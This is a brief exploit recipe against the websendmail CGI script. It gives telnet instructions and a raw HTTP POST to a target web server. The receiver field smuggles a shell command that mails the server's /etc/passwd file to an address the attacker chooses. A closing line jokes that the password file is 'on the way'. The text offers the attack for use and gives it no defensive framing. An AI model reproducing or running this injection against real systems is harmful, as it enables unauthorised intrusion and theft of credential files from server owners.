Exploit: telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: 85 (replace 85 with length of the "exploit" line) receiver=;mail+your_address\@somewhere.org< /etc/passwd;&sender=a&rtnaddr=a&subject=a &content=a Don't worry if the server displays an error message. The password file is on the way :).